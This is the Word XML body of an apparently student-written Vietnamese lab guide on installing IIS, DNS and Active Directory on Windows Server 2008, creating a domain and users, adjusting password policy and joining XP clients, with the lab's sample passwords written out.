          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cài đặt IIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4320C281" w14:textId="77777777" w:rsidR="00D50E85" w:rsidRDefault="00D50E85" w:rsidP="00D50E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="269B557E" wp14:editId="302B9652">
            <wp:extent cx="3230880" cy="242316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AF5F" w14:textId="77777777" w:rsidR="00D50E85" w:rsidRDefault="00D50E85" w:rsidP="00D50E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Next &gt; Next &gt; Install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457272EC" w14:textId="161B2B0E" w:rsidR="007504E3" w:rsidRPr="007504E3" w:rsidRDefault="00D50E85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       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13328F93" wp14:editId="15BAAE55">
            <wp:extent cx="3403600" cy="2552700"/>
            <wp:effectExtent l="0" t="0" r="6350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B678" w14:textId="2B4F6D83" w:rsidR="00D50E85" w:rsidRDefault="00D50E85" w:rsidP="00D50E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cài đặt thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212901A0" w14:textId="08489BA3" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7832FAAE" wp14:editId="56C7EEDA">
            <wp:extent cx="3505200" cy="2628900"/>
            <wp:effectExtent l="0" t="0" r="0" b="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D804" w14:textId="51FB0929" w:rsidR="00D50E85" w:rsidRPr="00D50E85" w:rsidRDefault="00D50E85" w:rsidP="00D50E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A21A307" w14:textId="5A17638B" w:rsidR="008B261F" w:rsidRPr="00D50E85" w:rsidRDefault="004A3141" w:rsidP="004A3141">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="-90"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D50E85">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D50E85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Tải </w:t>
      </w:r>
      <w:r w:rsidR="00D50E85" w:rsidRPr="00D50E85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Active Directory Server và DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E52B61E" w14:textId="77777777" w:rsidR="00D50E85" w:rsidRPr="00D50E85" w:rsidRDefault="00D50E85" w:rsidP="00D50E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-90"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53E7BFD6" w14:textId="1191F977" w:rsidR="007504E3" w:rsidRP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Sau khi cài DNS, Active Doman Service (làm tương tự DHCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F7BD27" w14:textId="612EBB5C" w:rsidR="007504E3" w:rsidRP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Win + R &gt; gõ dcpromo &gt; enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E735AF" w14:textId="46659C6D" w:rsidR="007504E3" w:rsidRPr="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13CDDF28" wp14:editId="5BF6D081">
            <wp:extent cx="3108960" cy="233172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61FA" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51D280C5" w14:textId="297C9E3C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lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26A9CFF0" wp14:editId="5B9AF351">
            <wp:extent cx="3149600" cy="236220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2C76" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A2F450" w14:textId="39CDB4C5" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="0075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ext &gt; Next &gt; tick vào ô Create a new doman in a new forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D83665E" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64FB2506" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11C84135" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nếu báo lỗi về tài khoản admin &gt; thoát Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7A428E" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F58132F" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ctr + Alt + Del &gt; Tạo mật khẩu cho administrator &gt; đăng nhập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E4C480" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(mật khẩu: Admin123)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63530E7B" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="045F766E" w14:textId="28F40413" w:rsidR="007504E3" w:rsidRPr="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007504E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tạo domain name (trinhvanminh.com)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4F0E8F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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62754F0D" wp14:editId="4966A3C0">
            <wp:extent cx="3657600" cy="2743200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716C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Chọn bản window server tương ứng (ở đây em dùng winserver 2008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2281FE2C" w14:textId="796DD67F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  </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01A4EA86" wp14:editId="2EC5CE21">
            <wp:extent cx="3241040" cy="2430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B1D4" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65B2F5AB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Next &gt; Next &gt; Chọn Yes, ……………………….</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D879171" w14:textId="456A6EA6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    </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75818B59" wp14:editId="05CBC5FE">
            <wp:extent cx="3429000" cy="2571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5A3D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Chọn Yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5109CD38" w14:textId="45278E55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 </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75774550" wp14:editId="7BAAF60F">
            <wp:extent cx="3429000" cy="2571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CF50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Chọn nơi lưu trữ database, hoặc để mặc định &gt; Next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA7EE1A" w14:textId="61460C76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 </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68AEA225" wp14:editId="0E8F59A9">
            <wp:extent cx="3637280" cy="272796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4493" w14:textId="7B36EACE" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E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xt &gt; Tạo mật khẩu cho admin có chức năng restore (tài khoản này khác với tài khoản admin của server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B617685" w14:textId="6FE89A22" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Restore Mode Password: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F928FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Admin123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750CB238" w14:textId="77777777" w:rsidR="007504E3" w:rsidRPr="00A9002B" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Next &gt; Next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031DF4DA" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F46EEE4" w14:textId="60F1D5E8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</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C6F514F" wp14:editId="458EFDEB">
            <wp:extent cx="4287520" cy="3215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44D" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="034585CB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Restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2A6BBB" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F739423" w14:textId="5960B8BF" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504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ỉnh lại các điều kiện password khi tạo user mới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10070432" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Search gpms.msc </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7838A0D7" w14:textId="4017B4F8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   </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19AFFF62" wp14:editId="0FE5125E">
            <wp:extent cx="3619500" cy="2714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5E87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Theo đường dẫn dưới chọn chuột phải vào Default Doman Policy &gt; Edit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445A35C9" w14:textId="00B68CDA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 </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61FE69BA" wp14:editId="782AECA5">
            <wp:extent cx="3555432" cy="265176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7455" cy="26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4A91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Theo đường dẫn dưới &gt; vào Password Policy &gt; chỉnh lại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0F81C1" w14:textId="0EE2FEF4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</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21C55B3F" wp14:editId="2B4A498B">
            <wp:extent cx="3535680" cy="265176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439" w14:textId="5863E23F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</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BF4222D" wp14:editId="3FCFF988">
            <wp:extent cx="3550920" cy="26631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A1C" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1494AA99" w14:textId="332B04E9" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E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pdate Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26615DF7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ab/>
        <w:t>Tại Desktop &gt; Win + R &gt; gpupdate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005E90EB" w14:textId="23CE41D8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</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28A4A070" wp14:editId="4EABADD9">
            <wp:extent cx="3649980" cy="2737485"/>
            <wp:effectExtent l="0" t="0" r="762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616" w14:textId="4D879C31" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504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ạo user cho Domain: (</w:t>
      </w:r>
      <w:r w:rsidRPr="0086138C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>username:minhtv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248F951C" w14:textId="77777777" w:rsidR="007504E3" w:rsidRPr="004E6CD7" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>Theo đường dẫn như hình dưới vào &gt; Active Directory Users and Computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3358103D" w14:textId="787FB014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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B392A69" wp14:editId="4B1CCA0C">
            <wp:extent cx="3722100" cy="2773680"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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90" cy="27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CF6C" w14:textId="0E1153DE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Theo đường dẫn &gt; chuột phải &gt; New &gt; User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E94536" w14:textId="29CB4BB6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  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A800846" wp14:editId="0CCA3E13">
            <wp:extent cx="3721735" cy="2768239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384" cy="27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26CD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Tạo user </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0A3573" w14:textId="24E1D35D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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45BC0DCF" wp14:editId="5A6A8CCC">
            <wp:extent cx="3924300" cy="2943225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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78B5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Tạo mật khẩu &gt; Next &gt; Finish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B70A260" w14:textId="37222B8F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</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44A85CB4" wp14:editId="09F94321">
            <wp:extent cx="3901440" cy="2926080"/>
            <wp:effectExtent l="0" t="0" r="381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28EC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Tạo thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B8BCE0" w14:textId="1B9A6AF1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</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A910562" wp14:editId="68884383">
            <wp:extent cx="3535680" cy="265176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C0BB" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A189A61" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CE749EA" w14:textId="448C0D24" w:rsidR="007504E3" w:rsidRPr="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007504E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Các thành viên đều thuộc một domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100B6536" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thay đổi DNS thành DNS của server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20367BDF" w14:textId="422C8D41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  </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E92DA4C" wp14:editId="72CD6A0D">
            <wp:extent cx="3649980" cy="2737485"/>
            <wp:effectExtent l="0" t="0" r="762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D6C7" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E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êm domain name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4E760C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Chuột phải vào My Computer &gt; Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66137775" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13DAC030" w14:textId="04378470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</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D6A69C3" wp14:editId="06682D31">
            <wp:extent cx="4629150" cy="3771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AE81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Chuyển sang tab Computer name &gt; Change &gt; ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D326620" w14:textId="14E9A6D5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     </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="659A71FD" wp14:editId="7113D1CC">
            <wp:extent cx="3909060" cy="421727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9786" cy="42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BC9B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Điền tên domain name (trinhvanminh.com) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C445E1F" w14:textId="467E94CC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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2064659D" wp14:editId="469AFE18">
            <wp:extent cx="3307080" cy="2480310"/>
            <wp:effectExtent l="0" t="0" r="762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C6F9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Đăng nhập với user đã tạo phía trên  (username:minhtv)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6CEDBD" w14:textId="255B803F" w:rsidR="007504E3" w:rsidRP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        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4312B230" wp14:editId="3F4AC29D">
            <wp:extent cx="3373120" cy="25298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36BE" w14:textId="77777777" w:rsidR="007504E3" w:rsidRPr="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69E5CAA6" w14:textId="77777777" w:rsidR="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Màn hình đăng nhập sau khi restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9C21EA" w14:textId="0613558F" w:rsidR="007504E3" w:rsidRPr="007610A9" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3218DF72" wp14:editId="7F40ED28">
            <wp:extent cx="3924300" cy="2758330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4349" cy="27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598B" w14:textId="7CD91E3C" w:rsidR="008B261F" w:rsidRDefault="008B261F" w:rsidP="008B261F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3069D491" w14:textId="7F47EF84" w:rsidR="008B261F" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007504E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tạo user win XP Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BC898D" w14:textId="77777777" w:rsidR="007504E3" w:rsidRPr="007504E3" w:rsidRDefault="007504E3" w:rsidP="007504E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A63B44" w14:textId="4DF34D24" w:rsidR="008B261F" w:rsidRPr="007504E3" w:rsidRDefault="008B261F" w:rsidP="007504E3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007504E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tạo user win XP Client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E34DE0" w14:textId="44E90665" w:rsidR="008B261F" w:rsidRPr="007504E3" w:rsidRDefault="008B261F" w:rsidP="007504E3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007504E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Với thông tin (user-password):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6809F443" w14:textId="1AE4BB53" w:rsidR="008B261F" w:rsidRPr="007504E3" w:rsidRDefault="008B261F" w:rsidP="007504E3">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007504E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Administrator(có sẵn) – minhtv (6 ký tự)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C0F32C" w14:textId="40C2E3F2" w:rsidR="008B261F" w:rsidRPr="007504E3" w:rsidRDefault="008B261F" w:rsidP="007504E3">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007504E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Client1 – client01 (8 ký tự)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA59562" w14:textId="5CB3F4C7" w:rsidR="008B261F" w:rsidRPr="007504E3" w:rsidRDefault="008B261F" w:rsidP="007504E3">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
